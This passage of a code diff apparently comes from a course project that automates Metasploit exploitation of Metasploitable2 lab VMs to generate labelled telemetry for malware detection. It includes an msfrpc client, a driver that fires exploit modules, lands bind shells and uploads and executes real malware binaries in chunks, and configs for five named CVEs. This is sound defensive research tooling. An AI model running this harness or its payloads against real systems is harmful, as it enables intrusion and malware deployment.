@ -0,0 +1,338 @@
|
|||
"""Tier-3 exploit driver.
|
||||
|
||||
Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
|
||||
the closed phase enum into msfrpc actions:
|
||||
|
||||
clean — idle. (no-op; exploit hasn't fired yet)
|
||||
armed — module loaded + options applied; module fires
|
||||
with ``module.execute``. Driver records the fire
|
||||
timestamp via ``emit_event`` so the labeler can
|
||||
align ``armed`` with what's actually happening.
|
||||
infecting — poll for a new session; on session_open, run a
|
||||
one-shot landing command (``id`` or similar) so
|
||||
we have a clear "session is responsive" event.
|
||||
infected_running — start observable workload inside the session.
|
||||
dormant — kill the workload, leave the session alive.
|
||||
reverting — kill session, snapshot revert handled by caller.
|
||||
|
||||
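The core events the driver writes match the schema in ``docs/data-model.md``:
|
||||
``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
|
||||
``session_killed``. It also emits ``driver_setup``, ``session_open_timeout``,
|
||||
``session_landing_probe``, and the ``real_binary_*`` audit events.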
|
||||
|
||||
The driver does NOT author exploits or pick payloads at runtime — those
|
||||
choices live in ``exploits/modules/*.toml``. The driver is a pure
|
||||
adapter between the phase machine and msfrpc.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from typing import Callable
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
from samples.manifest import Sample
|
||||
|
||||
from .modules import ModuleConfig
|
||||
from .msfrpc import MSFRpcClient, wait_for_new_session
|
||||
from .workloads import (
|
||||
ChunkedUpload, Workload, chunked_real_binary_upload,
|
||||
real_binary_workload, workload_for,
|
||||
)
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.exploits.driver")
|
||||
|
||||
EmitEvent = Callable[..., None]
|
||||
|
||||
|
||||
@dataclass
|
||||
class DriverConfig:
|
||||
target_ip: str
|
||||
session_open_timeout_s: float = 30.0
|
||||
# Driver v1 fallback workload — used only when no Sample is passed
|
||||
# in (Sample-driven runs override these via exploits.workloads).
|
||||
# We keep the v1 path so existing callers keep working unchanged.
|
||||
workload_cmd: str = "yes > /dev/null"
|
||||
workload_kill_cmd: str = "pkill yes; true"
|
||||
# Where staged real-malware binaries live on the lab host.
|
||||
sample_store_root: Path | None = None
|
||||
|
||||
|
||||
class MSFExploitDriver:
|
||||
"""Phase-to-msfrpc adapter. One instance per episode.
|
||||
|
||||
When constructed with a ``Sample``, the driver dispatches the
|
||||
``infected_running`` / ``dormant`` workload through
|
||||
``exploits.workloads`` so the in-session behaviour matches the
|
||||
sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
|
||||
low-and-slow, shell-resident). Without a sample, falls back to
|
||||
the v1 single-command workload — useful for the very first
|
||||
Tier-3 smoke runs."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
client: MSFRpcClient,
|
||||
module: ModuleConfig,
|
||||
cfg: DriverConfig,
|
||||
emit_event: EmitEvent,
|
||||
*,
|
||||
sample: Sample | None = None,
|
||||
) -> None:
|
||||
self.client = client
|
||||
self.module = module
|
||||
self.cfg = cfg
|
||||
self.emit = emit_event
|
||||
self.sample = sample
|
||||
# Chunked upload plan (None unless real binary path applies).
|
||||
self._chunked: ChunkedUpload | None = None
|
||||
self.workload: Workload | None = self._resolve_workload(sample)
|
||||
|
||||
self._sessions_seen_at_arm: set[int] = set()
|
||||
self._session_id: int | None = None
|
||||
self._job_id: int | str | None = None
|
||||
self._fired = False
|
||||
|
||||
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
|
||||
"""Pick the best workload for this sample:
|
||||
1. real binary (if staged at samples/store/<sha256>) → chunked
|
||||
upload + exec via dedicated dispatch path
|
||||
2. profile mimic from exploits.workloads
|
||||
3. None → driver v1 fallback (yes-loop)
|
||||
"""
|
||||
if sample is None:
|
||||
return None
|
||||
if sample.kind == "real" and self.cfg.sample_store_root is not None:
|
||||
bin_path = sample.binary_path(self.cfg.sample_store_root)
|
||||
if bin_path is not None:
|
||||
try:
|
||||
payload = bin_path.read_bytes()
|
||||
self._chunked = chunked_real_binary_upload(payload, sample=sample)
|
||||
# Return a Workload shell so the rest of the driver
|
||||
# can treat the dispatch uniformly. start_cmd is
|
||||
# never sent verbatim — _start_workload walks the
|
||||
# chunked plan instead.
|
||||
return Workload(
|
||||
profile=self._chunked.profile,
|
||||
start_cmd="(chunked-upload-managed-by-driver)",
|
||||
stop_cmd=self._chunked.stop_cmd,
|
||||
description=f"Real binary chunked upload+execute "
|
||||
f"({len(payload)} bytes, "
|
||||
f"{self._chunked.n_chunks} chunks)",
|
||||
)
|
||||
except OSError as e:
|
||||
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
|
||||
return workload_for(sample)
|
||||
|
||||
# ---- lifecycle ------------------------------------------------------
|
||||
|
||||
def setup(self) -> None:
|
||||
"""Authenticate and snapshot the pre-existing session set so we
|
||||
can recognize a *new* session as the one we just opened."""
|
||||
self.client.login()
|
||||
self._sessions_seen_at_arm = set(self.client.session_list().keys())
|
||||
self.emit(
|
||||
"driver_setup",
|
||||
module=self.module.module_path,
|
||||
payload=self.module.payload_path,
|
||||
target_ip=self.cfg.target_ip,
|
||||
preexisting_sessions=sorted(self._sessions_seen_at_arm),
|
||||
sample=self.sample.name if self.sample else None,
|
||||
sample_kind=self.sample.kind if self.sample else None,
|
||||
sample_sha256=self.sample.sha256 if self.sample else None,
|
||||
workload_profile=self.workload.profile if self.workload else None,
|
||||
)
|
||||
|
||||
def teardown(self) -> None:
|
||||
if self._session_id is not None:
|
||||
try:
|
||||
self.client.session_stop(self._session_id)
|
||||
self.emit("session_killed", session_id=self._session_id)
|
||||
except Exception:
|
||||
log.exception("session.stop on %s", self._session_id)
|
||||
if self._job_id is not None:
|
||||
try:
|
||||
self.client.job_stop(self._job_id)
|
||||
except Exception:
|
||||
log.debug("job.stop on %s (often already gone)", self._job_id)
|
||||
self.client.logout()
|
||||
|
||||
# ---- phase callback -------------------------------------------------
|
||||
|
||||
def set_phase(self, phase: str) -> None:
|
||||
log.info("driver phase -> %s", phase)
|
||||
if phase == "clean":
|
||||
return
|
||||
if phase == "armed":
|
||||
self._fire()
|
||||
elif phase == "infecting":
|
||||
self._await_session()
|
||||
elif phase == "infected_running":
|
||||
self._start_workload()
|
||||
elif phase == "dormant":
|
||||
self._stop_workload()
|
||||
elif phase == "reverting":
|
||||
self.teardown()
|
||||
else:
|
||||
log.warning("unknown phase: %s", phase)
|
||||
|
||||
# ---- actions --------------------------------------------------------
|
||||
|
||||
def _fire(self) -> None:
|
||||
if self._fired:
|
||||
log.debug("module already fired; skipping re-fire")
|
||||
return
|
||||
opts = self.module.render_options(target_ip=self.cfg.target_ip)
|
||||
self.emit(
|
||||
"exploit_fire",
|
||||
module=self.module.module_path,
|
||||
options={k: v for k, v in opts.items() if k != "PASSWORD"},
|
||||
)
|
||||
resp = self.client.module_execute(
|
||||
self.module.module_type, self.module.module_path, opts,
|
||||
)
|
||||
self._job_id = resp.get("job_id")
|
||||
self._fired = True
|
||||
|
||||
def _await_session(self) -> None:
|
||||
if self._session_id is not None:
|
||||
return
|
||||
result = wait_for_new_session(
|
||||
self.client,
|
||||
seen=self._sessions_seen_at_arm,
|
||||
timeout_s=self.cfg.session_open_timeout_s,
|
||||
)
|
||||
if result is None:
|
||||
self.emit(
|
||||
"session_open_timeout",
|
||||
module=self.module.module_path,
|
||||
timeout_s=self.cfg.session_open_timeout_s,
|
||||
)
|
||||
log.warning(
|
||||
"no session opened within %.1fs", self.cfg.session_open_timeout_s,
|
||||
)
|
||||
return
|
||||
sid, info = result
|
||||
self._session_id = sid
|
||||
self.emit(
|
||||
"session_open",
|
||||
session_id=sid,
|
||||
session_type=info.get("type"),
|
||||
tunnel_peer=info.get("tunnel_peer"),
|
||||
)
|
||||
# Landing probe so we have a known-good RTT marker on the wire.
|
||||
try:
|
||||
self.client.session_shell_write(sid, "id")
|
||||
time.sleep(0.5)
|
||||
out = self.client.session_shell_read(sid)
|
||||
self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
|
||||
except Exception:
|
||||
log.exception("landing probe on session %s", sid)
|
||||
|
||||
def _start_workload(self) -> None:
|
||||
if self._session_id is None:
|
||||
            log.warning("infected_running with no session — skipping workload")
            return
        if self._chunked is not None:
            self._upload_real_binary_chunked()
            return
        if self.workload is not None:
            # Driver v2 — profile-matched mimic workload.
            self.client.session_shell_write(self._session_id, self.workload.start_cmd)
            self.emit(
                "sample_executed",
                session_id=self._session_id,
                profile=self.workload.profile,
                description=self.workload.description,
                sample=self.sample.name if self.sample else None,
            )
        else:
            # Driver v1 fallback.
            self.client.session_shell_write(
                self._session_id,
                f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
                f">/dev/null 2>&1 & disown",
            )
            self.emit(
                "sample_executed",
                session_id=self._session_id,
                command=self.cfg.workload_cmd,
            )

    def _upload_real_binary_chunked(self) -> None:
        """Walk the ChunkedUpload plan: each chunk is a separate
        shell_write so msfrpc never sees a buffer-busting payload.
        Verifies the in-guest sha256 before exec; emits per-step
        events so we have a wire-level audit trail of Tier-4 runs."""
        plan = self._chunked
        assert plan is not None and self._session_id is not None
        sid = self._session_id

        self.emit(
            "real_binary_upload_begin",
            session_id=sid,
            n_chunks=plan.n_chunks,
            sha256=plan.expected_sha256,
            sample=self.sample.name if self.sample else None,
        )
        for i, chunk in enumerate(plan.chunks):
            self.client.session_shell_write(sid, chunk)
            # Read back so the next write doesn't race ahead of the
            # previous one's prompt return. We don't parse it.
            try:
                self.client.session_shell_read(sid)
            except Exception:
                pass

        # Decode + verify on the guest side.
        self.client.session_shell_write(sid, plan.finalize_cmd)
        try:
            verify_out = self.client.session_shell_read(sid)
        except Exception:
            verify_out = ""
        verified = "sha-ok" in verify_out
        self.emit(
            "real_binary_verify",
            session_id=sid,
            ok=verified,
            output=verify_out.strip()[:256],
            sha256=plan.expected_sha256,
        )
        if not verified:
            self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
            return

        # Launch.
        self.client.session_shell_write(sid, plan.exec_cmd)
        self.emit(
            "sample_executed",
            session_id=sid,
            profile=plan.profile,
            sample=self.sample.name if self.sample else None,
            sha256=plan.expected_sha256,
            kind="real",
        )

    def _stop_workload(self) -> None:
        if self._session_id is None:
            return
        if self.workload is not None:
            self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
        else:
            self.client.session_shell_write(
                self._session_id, self.cfg.workload_kill_cmd,
            )
        self.emit(
            "session_dormant",
            session_id=self._session_id,
            profile=self.workload.profile if self.workload else None,
        )


def _shquote(s: str) -> str:
    # Minimal POSIX single-quote escaping. The workload command is set
    # by us, not by anything user-controlled, so we just need to handle
    # embedded single quotes correctly for completeness.
    return "'" + s.replace("'", "'\\''") + "'"
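The quoting rule in `_shquote` can be checked against the standard library's `shlex.split`, which parses POSIX-style quoting. The block below is a minimal sketch: `shquote` is a standalone copy of the helper, and `round_trips` and the sample strings are illustrative names, not part of the repo.

```python
import shlex


def shquote(s: str) -> str:
    # Standalone copy of the helper: close the quote, emit an escaped
    # single quote, then reopen the quote.
    return "'" + s.replace("'", "'\\''") + "'"


def round_trips(s: str) -> bool:
    # shlex.split applies POSIX quoting rules, so a correctly quoted
    # string must come back as exactly one token equal to the input.
    return shlex.split(shquote(s)) == [s]


# Illustrative inputs only; none of these come from the driver config.
samples = ["yes > /dev/null", "echo 'hi'", "a'b'c", "$(id); `id`"]
results = {s: round_trips(s) for s in samples}
```

If every value in `results` is true, the shell sees the workload command as one literal argument to `sh -c`, with no expansion of `$(...)` or backticks by the outer shell.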
147
exploits/modules.py
Normal file
@ -0,0 +1,147 @@
"""TOML loader for exploit-module configs.

Each ``exploits/modules/*.toml`` describes one Metasploit module — its
path, the options to set, the payload to use, and how the driver
should treat the resulting session. The driver consumes ``ModuleConfig``
objects; the TOML files are the on-disk source of truth.

Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
imperative and assume an interactive console; the driver needs the
*structured* options to push them through msfrpc. TOML is the simplest
way to express a small typed map of options — and it round-trips
cleanly into ``meta.json`` for episode reproducibility.

Per-(host, slot, episode) selection mirrors the sample-manifest
selector: we want different vulnerabilities exercised across hosts
and waves so the trained model sees a diverse corpus of
``armed → infecting`` transition shapes, not just the same FTP
backdoor every run.
"""

from __future__ import annotations

import hashlib
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any


_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}


@dataclass(frozen=True)
class ModuleConfig:
    name: str                              # short id, e.g. "vsftpd_234_backdoor"
    module_type: str                       # "exploit" | "auxiliary" | "post"
    module_path: str                       # e.g. "unix/ftp/vsftpd_234_backdoor"
    options: dict[str, Any] = field(default_factory=dict)
    payload_path: str | None = None        # e.g. "cmd/unix/interact"
    payload_options: dict[str, Any] = field(default_factory=dict)
    expected_session_type: str = "shell"   # what we'll get on success
    description: str = ""
    # When true the module's payload uses a callback channel (reverse
    # or bind shell) and won't land a session under SLIRP+restrict=on.
    # The fleet runner skips these unless BRIDGE is set so episodes
    # that fire them actually produce data.
    requires_bridge: bool = False

    def render_options(self, *, target_ip: str) -> dict[str, Any]:
        """Substitute ``{{ target_ip }}`` placeholders in options.

        Module configs use Jinja-style placeholders for any value that
        isn't known until episode time (RHOSTS, LHOST, etc.). Today the
        only supported placeholder is ``target_ip``; if more are needed
        later, generalize here."""
        out: dict[str, Any] = {}
        for k, v in self.options.items():
            if isinstance(v, str) and "{{" in v:
                out[k] = (
                    v.replace("{{ target_ip }}", target_ip)
                    .replace("{{target_ip}}", target_ip)
                )
            else:
                out[k] = v
        # MSF requires PAYLOAD as a top-level option even though we
        # carry it in a separate field on the config.
        if self.payload_path:
            out["PAYLOAD"] = self.payload_path
        for k, v in self.payload_options.items():
            if isinstance(v, str) and "{{" in v:
                v = (
                    v.replace("{{ target_ip }}", target_ip)
                    .replace("{{target_ip}}", target_ip)
                )
            out[k] = v
        return out


def load_module_config(path: Path) -> ModuleConfig:
    raw = tomllib.loads(path.read_text())
    mod = raw.get("module") or {}
    module_path = mod.get("path")
    module_type = mod.get("type", "exploit")
    if not isinstance(module_path, str) or not module_path:
        raise ValueError(f"{path}: module.path must be a non-empty string")
    if module_type not in _VALID_MODULE_TYPES:
        raise ValueError(
            f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
        )
    options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
    payload = raw.get("payload") or {}
    return ModuleConfig(
        name=path.stem,
        module_type=module_type,
        module_path=module_path,
        options=dict(options),
        payload_path=payload.get("path"),
        payload_options=dict(payload.get("options") or {}),
        expected_session_type=raw.get("session", {}).get("type", "shell"),
        description=raw.get("description", ""),
        requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
    )


def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
    """Load every ``*.toml`` under ``directory``, keyed by short name."""
    return {
        p.stem: load_module_config(p)
        for p in sorted(directory.glob("*.toml"))
    }


def select_module(
    catalog: dict[str, ModuleConfig],
    *,
    host_id: str,
    slot: int,
    episode_index: int,
) -> ModuleConfig:
    """Deterministic per-(host, slot, ep) module selector. Mirrors
    SampleManifest.select() so the entry vector rotates the same way
    the post-infection workload does. Two hosts usually hash to
    different modules at the same slot/episode (collision rate ~1/N
    for a catalog of N modules). Selection is hash-based rather than
    round-robin, so a single host is only expected to have touched
    every module after roughly N*ln(N) episodes, not exactly N.

    Inputs reduce to a SHA-256 keyed lookup so runs replay
    bit-identically given the same catalog and (host, slot, ep) tuple."""
    if not catalog:
        raise ValueError("module catalog is empty")
    keys = sorted(catalog.keys())
    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
    h = hashlib.sha256(seed).digest()
    idx = int.from_bytes(h[:8], "big") % len(keys)
    return catalog[keys[idx]]


def module_target_port(module: ModuleConfig) -> int | None:
    """Pull the RPORT off a module config. Used by the fleet runner
    to wire the launcher's hostfwd to the right service inside the
    target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
    unrealircd:6667)."""
    rport = module.options.get("RPORT")
    if isinstance(rport, int):
        return rport
    if isinstance(rport, str) and rport.isdigit():
        return int(rport)
    return None
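The determinism claim for `select_module` can be illustrated in isolation. The sketch below repeats the same hash construction on plain strings; `pick`, the host id `lab-host-a`, and the 50-episode range are hypothetical and only serve the demonstration.

```python
import hashlib


def pick(keys: list[str], host_id: str, slot: int, episode_index: int) -> str:
    # Same construction as select_module: hash the tuple, reduce the
    # first 8 digest bytes modulo the catalog size, index the sorted keys.
    ordered = sorted(keys)
    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
    digest = hashlib.sha256(seed).digest()
    return ordered[int.from_bytes(digest[:8], "big") % len(ordered)]


catalog = [
    "distccd_command_exec",
    "php_cgi_arg_injection",
    "samba_usermap_script",
    "unreal_ircd_3281_backdoor",
    "vsftpd_234_backdoor",
]

# "lab-host-a" is a made-up host id. Because the keys are sorted before
# indexing, the order in which the catalog was loaded does not matter.
first = [pick(catalog, "lab-host-a", 0, ep) for ep in range(50)]
again = [pick(list(reversed(catalog)), "lab-host-a", 0, ep) for ep in range(50)]
```

Replaying the same tuples yields the same sequence, which is the property the episode metadata relies on. Adding or removing a catalog entry changes the modulus and therefore the whole sequence.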
36
exploits/modules/distccd_command_exec.toml
Normal file
@ -0,0 +1,36 @@
description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The
distcc daemon doesn't verify the source of compile jobs, so a
crafted DCC_CMD-style request runs an arbitrary command as the
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
3632. Returns a low-priv shell — paired with a privesc later if
needed; for envelope work the unprivileged shell is enough.
"""

[module]
type = "exploit"
path = "unix/misc/distcc_exec"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 3632

[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4444

[session]
type = "shell"

[runtime]
# Reverse/bind callback path → needs the host-only bridge so the
# guest can reach the attacker (or the host can reach the bind port
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
# lab host to enable.
requires_bridge = true
extra_target_ports = [4444]
28
exploits/modules/php_cgi_arg_injection.toml
Normal file
@ -0,0 +1,28 @@
description = """
PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
treats query-string args as command-line flags, letting a crafted
?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
shell session running as the user that runs Apache.
"""

[module]
type = "exploit"
path = "multi/http/php_cgi_arg_injection"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 80
TARGETURI = "/"

[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4445

[session]
type = "shell"

[runtime]
requires_bridge = true
extra_target_ports = [4445]
21
exploits/modules/samba_usermap_script.toml
Normal file
@ -0,0 +1,21 @@
description = """
Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
is a crafted username at SMB authentication; the Samba daemon shells
out via the `username map script` setting and runs whatever the
attacker put in the username. Standard Metasploitable2 vector. Returns
a root shell on the SMB socket — works with cmd/unix/interact.
"""

[module]
type = "exploit"
path = "multi/samba/usermap_script"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 139

[payload]
path = "cmd/unix/interact"

[session]
type = "shell"
28
exploits/modules/unreal_ircd_3281_backdoor.toml
Normal file
@ -0,0 +1,28 @@
description = """
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
shipped to the official mirrors carried a backdoor that runs an
arbitrary command on receipt of a magic AB; payload string. Once
the backdoor was discovered the official tarball was pulled, but
Metasploitable2 still ships the trojaned build. Returns a shell
running as the IRC user.
"""

[module]
type = "exploit"
path = "unix/irc/unreal_ircd_3281_backdoor"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 6667

[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4446

[session]
type = "shell"

[runtime]
requires_bridge = true
extra_target_ports = [4446]
23
exploits/modules/vsftpd_234_backdoor.toml
Normal file
@ -0,0 +1,23 @@
description = """
vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
USER name ending with ':)'. Standard Metasploitable2 exploit, fully
deterministic — perfect for a Tier-3 first-light run because the
exploit fire timing is bounded by a single FTP round-trip.
"""

[module]
type = "exploit"
path = "unix/ftp/vsftpd_234_backdoor"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 21
# The exploit returns its own command shell — we drive it with a
# minimal cmd/unix/interact payload so the session lands as a plain
# shell session usable by session.shell_write/read.

[payload]
path = "cmd/unix/interact"

[session]
type = "shell"
231
exploits/msfrpc.py
Normal file
@ -0,0 +1,231 @@
"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.

We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
huge; this client implements only the verbs we actually call:

  auth.login               — get a token
  auth.logout              — release the token
  module.execute           — fire an exploit (or aux) module by name
  job.list / job.stop      — manage the running module
  session.list             — see opened sessions, find the one we just opened
  session.shell_write/read — run commands in a shell session
  session.stop             — kill a session at episode end

Why not pull in pymetasploit3? Two reasons:
  - msfrpcd's protocol is small enough that owning it removes a third-party
    dep (and a maintenance risk on a course project).
  - the parts we need (session opening, shell commands, job lifecycle)
    are simple, and we want full visibility into what's on the wire when
    debugging an exploit fire.

The client is intentionally synchronous; the Tier-3 driver runs in the
orchestrator's main thread alongside the collector, and a session-open
poll of a few hundred milliseconds is well within budget.
"""

from __future__ import annotations

import http.client
import logging
import socket
import ssl
import time
from dataclasses import dataclass
from typing import Any

try:
    import msgpack  # type: ignore[import-untyped]
except ImportError as e:  # pragma: no cover - import-time guard
    raise ImportError(
        "the msgpack package is required for the MSF RPC client. "
        "install it with: pip install msgpack"
    ) from e


log = logging.getLogger("cis490.msfrpc")


class MSFRpcError(RuntimeError):
    """Raised when msfrpcd returns an error or a malformed response."""


@dataclass
class MSFRpcConfig:
    host: str = "127.0.0.1"
    port: int = 55553
    user: str = "msf"
    password: str = ""
    ssl: bool = True
    timeout_s: float = 30.0
    # msfrpcd's default cert is self-signed — most callers will run
    # against localhost where this is the right tradeoff. Override
    # explicitly for any non-loopback host.
    verify: bool = False


class MSFRpcClient:
    """Synchronous msfrpcd client. Token is acquired on ``login()`` and
    re-used on every subsequent call. Not thread-safe; the driver owns
    one client per episode."""

    def __init__(self, cfg: MSFRpcConfig) -> None:
        self.cfg = cfg
        self._token: str | None = None

    # ---- session management --------------------------------------------

    def login(self) -> None:
        resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
        if resp.get("result") != "success" or "token" not in resp:
            raise MSFRpcError(f"auth.login failed: {resp!r}")
        self._token = resp["token"]
        log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])

    def logout(self) -> None:
        if self._token is None:
            return
        try:
            self._call("auth.logout", self._token)
        except MSFRpcError as e:
            log.warning("msfrpc auth.logout: %s", e)
        finally:
            self._token = None

    # ---- modules --------------------------------------------------------

    def module_execute(
        self,
        module_type: str,
        module_name: str,
        options: dict[str, Any],
    ) -> dict[str, Any]:
        """Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
        resp = self._call("module.execute", module_type, module_name, options)
        if "job_id" not in resp:
            raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
        log.info(
            "module.execute %s/%s -> job_id=%s uuid=%s",
            module_type, module_name, resp["job_id"], resp.get("uuid"),
        )
        return resp

    # ---- jobs -----------------------------------------------------------

    def job_list(self) -> dict[str, str]:
        return self._call("job.list")

    def job_stop(self, job_id: int | str) -> dict[str, Any]:
        # msfrpcd accepts the id as a string.
        return self._call("job.stop", str(job_id))

    # ---- sessions -------------------------------------------------------

    def session_list(self) -> dict[int, dict[str, Any]]:
        raw = self._call("session.list")
        # msfrpcd keys session ids as ints in msgpack but some versions
        # round-trip them as strings. Normalize.
        out: dict[int, dict[str, Any]] = {}
        for k, v in (raw or {}).items():
            try:
                out[int(k)] = v
            except (TypeError, ValueError):
                pass
        return out

    def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
        if not data.endswith("\n"):
            data = data + "\n"
        return self._call("session.shell_write", session_id, data)

    def session_shell_read(self, session_id: int) -> str:
        resp = self._call("session.shell_read", session_id)
        return resp.get("data", "") if isinstance(resp, dict) else ""

    def session_stop(self, session_id: int) -> dict[str, Any]:
        return self._call("session.stop", session_id)

    # ---- transport ------------------------------------------------------

    def _call(self, method: str, *args: Any) -> dict[str, Any]:
        if self._token is None:
            raise MSFRpcError("not authenticated; call login() first")
        return self._raw_call([method, self._token, *args])

    def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
        return self._raw_call([method, *args])

    def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
        body = msgpack.packb(payload, use_bin_type=False)
        conn = self._open_conn()
        try:
            conn.request(
                "POST",
                "/api/",
                body=body,
                headers={
                    "Content-Type": "binary/message-pack",
                    "Content-Length": str(len(body)),
                    "Connection": "close",
                },
            )
            r = conn.getresponse()
            raw = r.read()
            if r.status != 200:
                raise MSFRpcError(
                    f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
                )
        except (socket.error, http.client.HTTPException) as e:
            raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
        finally:
            conn.close()

        try:
            decoded = msgpack.unpackb(raw, raw=False)
        except Exception as e:
            raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e

        if isinstance(decoded, dict) and decoded.get("error") is True:
            raise MSFRpcError(
                f"{payload[0]!r}: {decoded.get('error_class')} "
                f"{decoded.get('error_message')}"
            )
        if not isinstance(decoded, dict):
            # session.list and friends can legitimately return an empty
            # dict, but never a non-dict; anything else is a protocol
            # violation.
            raise MSFRpcError(
                f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
            )
        return decoded

    def _open_conn(self) -> http.client.HTTPConnection:
        if self.cfg.ssl:
            ctx = ssl.create_default_context()
            if not self.cfg.verify:
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
            return http.client.HTTPSConnection(
                self.cfg.host, self.cfg.port,
                timeout=self.cfg.timeout_s, context=ctx,
            )
        return http.client.HTTPConnection(
            self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
        )


def wait_for_new_session(
    client: MSFRpcClient,
    *,
    seen: set[int],
    timeout_s: float,
    poll_s: float = 0.25,
) -> tuple[int, dict[str, Any]] | None:
    """Poll ``session.list`` until a session id we haven't seen before
    appears, or until timeout. Returns ``(session_id, info)`` or None."""
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        sessions = client.session_list()
        for sid, info in sessions.items():
            if sid not in seen:
                return sid, info
        time.sleep(poll_s)
    return None
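The snapshot-then-poll pattern behind `wait_for_new_session` can be exercised without a running `msfrpcd`. The sketch below is an assumption-laden stand-in: `FakeClient` is hypothetical and only implements `session_list()`, and the polling loop is repeated so the block runs on its own.

```python
import time
from typing import Any


class FakeClient:
    """Hypothetical stand-in for MSFRpcClient: a second session shows
    up on the third call to session_list()."""

    def __init__(self) -> None:
        self.calls = 0

    def session_list(self) -> dict[int, dict[str, Any]]:
        self.calls += 1
        sessions: dict[int, dict[str, Any]] = {1: {"type": "shell"}}
        if self.calls >= 3:
            sessions[2] = {"type": "shell"}
        return sessions


def wait_for_new_session(client, *, seen, timeout_s, poll_s=0.25):
    # Same loop as the module-level helper, repeated for a standalone run.
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        for sid, info in client.session_list().items():
            if sid not in seen:
                return sid, info
        time.sleep(poll_s)
    return None


client = FakeClient()
# Snapshot the existing session ids before firing the module, so that
# a session left over from an earlier run is not mistaken for a new one.
seen = set(client.session_list())
found = wait_for_new_session(client, seen=seen, timeout_s=2.0, poll_s=0.01)
```

Taking the `seen` snapshot before `module.execute` is the important part of the design: the helper reports only ids that were absent at snapshot time.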
346
exploits/workloads.py
Normal file
@ -0,0 +1,346 @@
"""Per-sample-profile post-exploit workloads (driver v2).

The Tier-3 driver lands a session and then needs to drive *something*
in that session for the ``infected_running`` phase. Driver v1 ran
``yes > /dev/null`` for every sample, which is fine for proving the
pipe but is the wrong shape for ML — every Tier-3 episode produces
the same envelope regardless of which malware family we said it was.

Driver v2 maps ``sample.profile`` from the manifest to a distinct
in-session workload so each profile's envelope is observably
different on every collector:

  cpu-saturate   → 1-vCPU saturation, very low IO/net (XMRig shape)
  scan-and-dial  → SYN scans across the bridge IP space + periodic
                   dial-home (Mirai shape)
  io-walk        → fs traversal + random write spikes (ransomware shape)
  bursty-c2      → long idle, periodic short TCP egress bursts (Dridex)
  low-and-slow   → minimal CPU, periodic memory churn (Kovter)
  shell-resident → one long-lived TCP socket pinned to a bridge IP,
                   occasional small command bursts (RAT)

Each profile returns a small shell command that backgrounds a loop
inside the session. The driver can stop them by killing the loop's
PID file or via a profile-specific kill command.

This module is intentionally *behaviorally diverse but harmless* —
it does NOT execute real malware. Real binaries land via the Tier-4
fetch+run path (separate work). What this gives us today is six
distinguishable in-guest envelopes the ML model can learn to
discriminate between *and* fall back to when a real sample isn't yet
staged.
"""

from __future__ import annotations

import logging
from dataclasses import dataclass

from samples.manifest import Sample


log = logging.getLogger("cis490.exploits.workloads")


@dataclass(frozen=True)
class Workload:
    """A pair of shell commands executable in a Metasploit shell session.

    ``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
    ``stop_cmd`` kills the loop using that PID file. Both commands are
    expected to be POSIX-shell compatible and to leave the session in
